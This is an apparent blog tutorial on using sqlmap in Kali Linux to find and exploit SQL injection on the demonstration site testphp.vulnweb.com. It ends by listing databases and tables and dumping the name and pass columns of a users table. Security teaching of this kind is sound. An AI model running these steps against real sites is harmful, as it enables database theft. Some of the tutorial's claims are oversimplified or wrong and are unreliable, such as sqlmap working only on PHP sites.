kali linux tools (SQLmap)

What is SQL injection (SQLi)?

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application’s content or behavior.

In some situations, an attacker can escalate an SQL injection attack to compromise the underlying server or other back-end infrastructure, or perform a denial-of-service attack.

What is SQLmap?

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Where we can use sqlmap?

If you observe a web url that is of the form http://testphp.vulnweb.com/listproducts.php?cat=1, where the ‘GET’ parameter is in bold, then the website may be vulnerable to this mode of SQL injection, and an attacker may be able to gain access to information in the database. Furthermore, SQLMAP works when it is php based.

A simple test to check whether your website is vulnerable would to be to replace the value in the get request parameter with an asterisk (*). For example, 
 

http://testphp.vulnweb.com/listproducts.php?cat=* 

If this results in an error such as the error given above, then we can conclusively say that the website is vulnerable. 

Installing SQLmap

SQLMAP comes pre – installed with kali linux, which is the preferred choice of most penetration testers. However, you can install sqlmap on other debian based linux systems using the command 
 

 sudo apt-get install sqlmap 

Usage

In this article, we will make use of a website that is designed with vulnerabilities for demonstration purposes: 
 

 http://testphp.vulnweb.com/listproducts.php?cat=1 

As you can see, there is a GET request parameter (cat = 1) that can be changed by the user by modifying the value of cat. So this website might be vulnerable to SQL injection of this kind. 
To test for this, we use SQLMAP. To look at the set of parameters that can be passed, type in the terminal, 

sqlmap -h
 

Using SQLMAP to test a website for SQL Injection vulnerability: 

1- first step :is to check that the website is vulnerable with SQL injection

So firstly, we have to enter the web url that we want to check along with the -u parameter. We may also use the –tor parameter if we wish to test the website using proxies

 sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

if you get error-based that mean that we get an SQL injection vulnerability

2- second step :is to get data base list

 Now typically, we would want to test whether it is possible to gain access to a database. So we use the –dbs option to do so. –dbs lists all the available databases. 
 

 sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs 
available data base

we get the following output showing us that there are two available databases. Sometimes, the application will tell you that it has identified the database and ask whether you want to test other database types. You can go ahead and type ‘Y’. Further, it may ask whether you want to test other parameters for vulnerabilities, type ‘Y’ over here as we want to thoroughly test the web application.

We observe that their are two databases, acuart and information_schema

we will choose one of the two data base and continue testing

3- step 3 :List information about Tables present in a particular Database 
To try and access any of the databases, we have to slightly modify our command. We now use -D to specify the name of the database that we wish to access, and once we have access to the database, we would want to see whether we can access the tables. For this, we use the –tables query. Let us access the acuart database. 
 

 sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 
-D acuart --tables 

the list of available tables

in the above picture, we see that 8 tables have been retrieved. So now we definitely know that the website is vulnerable. 

4- step four : List information about the columns of a particular table

If we want to view the columns of a particular table, we can use the following command, in which we use -T to specify the table name, and –columns to query the column names. We will try to access the table ‘users’

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 
-D acuart -T users --columns 
extract columns from users table

columns of users table

5- step five : Dump the data from the columns 
Similarly, we can access the information in a specific column by using the following command, where -C can be used to specify multiple column name separated by a comma, and the –dump query retrieves the data 
 

 sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1
-D acuart -T users -C name,pass --dump 
dumped data

from the above picture, we can see that we have accessed the data from the database. Similarly, in such vulnerable websites, we can literally explore through the databases to extract information

Share this post

Leave a Reply

Your email address will not be published.


Select your currency
USD United States (US) dollar